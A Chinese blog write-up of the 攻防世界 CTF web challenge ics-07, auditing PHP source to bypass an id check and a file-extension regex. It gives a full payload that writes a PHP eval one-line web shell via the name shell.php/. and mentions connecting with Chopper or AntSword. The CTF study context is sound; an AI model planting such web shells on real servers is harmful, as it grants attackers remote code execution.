攻防世界 WEB ics-07

最新推荐文章于 2024-04-15 10:47:16 发布
最新推荐文章于 2024-04-15 10:47:16 发布
阅读量181 收藏
点赞数
分类专栏: 攻防世界 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/119913480
版权

这题就是单纯的源码分析,代码一共三段,第一段没什么好看的,page参数不是index.php就行,重点关注后两段,需要注意的点都写了注释了,那么,就总结一下
其实先执行的是第二段,对id参数进行了判断,id参数要有且浮点化第一位不能是1,1.0000和‘1’当然不等,最后一位得是‘9’,因此构造id=1,9
成功回显admin,那么有了admin权限,就可以判断第一段,文件路径是拼接来的,完整路径是uploaded/backup/文件名也是用户自己起,只不过正则过滤掉php,php3,
php4,php5,php7这几个后缀,但是因为$,他只在最后判断.php后缀,所以只要结尾的不是.php就可以过这个正则
构造shell.php/.,当linux读取到shell.php会自动调用php程序去处理,/.表示调用shell.php文件本身,因此我们的文件也就传了上去,成功写入,后面就是菜刀或者蚁剑连接
就好

给一个完整payload index.php?page=flag.php&id=1,9
POST数据:con=<?php @eval($_POST['nihao']); ?>&file=shell.php/.

 <?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];//con是shell内容
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){//注意这个$,不然这个正则你可能了解歪了
          die("Bad file extension");
       }else{
            chdir('uploaded');//文件夹路径应该在uploaded/backup/
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>
 <?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { //id=1,9,经测试,数据库里只有一条数据,因此只有1能回显
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

那个视频里我最后蚁剑连不上是因为把con错写成了conn,做法没问题,大家注意一下就好
参考视频链接:https://www.bilibili.com/video/BV1Hv411A7GQ/

显哥无敌
关注
专栏目录
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127836871
Web安全攻防世界09 ics-07(XCTF)
weixin_42789937的博客
01-29 1069
Web安全攻防世界09 ics-07(XCTF),友情提示:攻防世界最近的答环境不太稳定,我这篇没有做到最后一步...
攻防世界CTF | WP】ics-07
ethan18的博客
02-01 2230
攻防世界CTF | WP】ics-07目思路查看界面 目 思路 查看界面 打开目,我们可以看到一个只有项目管理界面可以进行操作的网站,项目管理界面如下 我们看到有一个源代码链接,点击链接的源代码如下 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) &&
【愚公系列】2023年06月 攻防世界-Webics-07
时光隧道
06-15 4170
php是一种弱类型语言,意味着在变量的赋值和使用过程中,不需要显式地定义变量的类型。php会根据变量的值自动判断变量的数据类型。floatval是php中的一个内置函数,用于将变量转换为浮点数型数据。如果变量的值不能被转换成数字,则返回0。3.14在这个例子中,$num变量被赋值为字符串"3.14",但在使用floatval函数将其转换为浮点型数据后,$float_num变量中存储的值为3.14。preg_match是php中的一个正则表达式匹配函数,用于检索字符串中的特定模式。
攻防世界----ics-07
qq_44418229的博客
07-26 458
攻防世界---ics-07 分析源码+正则
攻防世界WEB】难度五星15分进阶ics-07
07-24 606
攻防世界WEB】五星15分
攻防世界Training-Stegano-1
10-31
【标】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界misc2-1杂项
11-20
攻防世界misc2-1杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127947409
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜。这个谜涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界ics-07
最新发布
wangzhemvp的博客
04-15 620
session 的工作机制是:为每个访客创建一个唯一的 id (UID),并基于这个 UID 来存储变量。我们递归的在1.php文件夹中再创建2.php,访问1.php/2.php/..进入的是1.php文件夹。匹配 ".php"、".php3"、".php4"、".php5"、".php7"、".phpt" 或 ".phtml" 结尾的文件名。(1)if ($_SESSION['admin']):判断 session 中的 admin 是否有值。一个点调用最后面的文件,两个点调用第一个文件。
攻防世界web进阶区ics-07详解
hxhxhxhxx的博客
08-07 1588
攻防世界web进阶区ics-07详解目详解floatvalsubstr 目 当然又是熟悉的界面,熟悉的ics目,熟悉的只能点击一个页面 详解 这里进来有一个view-source 点击看看 是一堆代码。我们进行尝试审计 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]
攻防世界web进阶区ics-07
gongjingege的博客
08-14 451
目描述:工控云管理系统项目管理页面解析漏洞 打开靶机 根据目描述,点击项目管理 点击view-source可以查看源码 大概有三部分 1, <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') {
攻防世界xctf writeup ics-07
qq_43370221的博客
04-20 728
文章目录xctf_writeup_ics-07审计代码审计写入文件代码构造最后的payload菜刀连接的到webshell xctf_writeup_ics-07 审计代码 浏览页面 发现了view-source链接 ,接下来审计代码 if (!isset($_GET[page])) { show_source(__FILE__); die(); }...
攻防世界 Web_php_include(include)
Haowill的博客
04-15 1029
Web_php_include 一拿到这道目看到include,我觉得像是一道文件包含漏洞的目,这种漏洞一般做法有两种 1.包含的文件在本地上传一个webshell去,该webshell在本地,运行webshell就可以用菜刀去连上 2.如果包含的文件不本地,是远程的网上的文件,那么我们可以黑它远程的那个文件。这样也可以getshell。 拿到目 很有意思这个目给的是源代码。 <?...
攻防世界-web-ics-07-从0到1的解历程writeup
CTF小白的博客
04-17 3378
目分析 首先拿到目描述:工控云管理系统项目管理页面解析漏洞 找到目入口 点击view-source对源码进行审计 if (isset($_GET[page]) && $_GET[page] != 'index.php') {      include('f...
攻防世界 ics-07
qq_43622442的博客
03-05 1513
攻防世界 ics-07 写在txt里当笔记太不方便了= =以后还是写这儿吧 1.打开首页是这样子 2.看那个提示,一开始我还以为是直接view-source,没想到那个是个超链接= =点它,出现源码 3.审计一下,利用点在这儿: 4.但是session我们无法自己伪造,看下面的代码: 5.看到sql就想注入= =但是这里宽字节并不行。看一下这句,只要result有值我们就可以上传文件了...
攻防世界 web 进阶 ics-07
weixin_42499640的博客
08-11 4619
工控云管理系统项目管理页面解析漏洞 /index.php 看到view-source 看一下源码 <?php if ($_SESSION['admin']) { $con = $_POST['con']; $file = $_POST['file']; $filename = "backup/".$file; if(pre...
攻防世界 web 进阶 i-got-id-200
weixin_42499640的博客
08-09 2200
目:i-got-id-200 目来源: csaw-ctf-2016-quals 打开网页 有三个页面 Hello World Forms Files 都是 .pl 后缀 都是用perl编写的网页文件 Froms用了CGI Files用了upload 尝试发现上传文件支持所有格式的文件 Froms是把输入的内容打印到屏幕 简单猜测后台的代码是这样的 perl use strict; use w...
攻防世界 ics-07
09-05
攻防世界是一个国际性的网络安全竞赛,其中 ICS-07 是指第七届工控系统安全挑战赛(Industrial Control System Security Challenge)。个比赛主要关注工控系统安全领域,参赛者需要在模拟的工控环境中进行攻击和防御...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值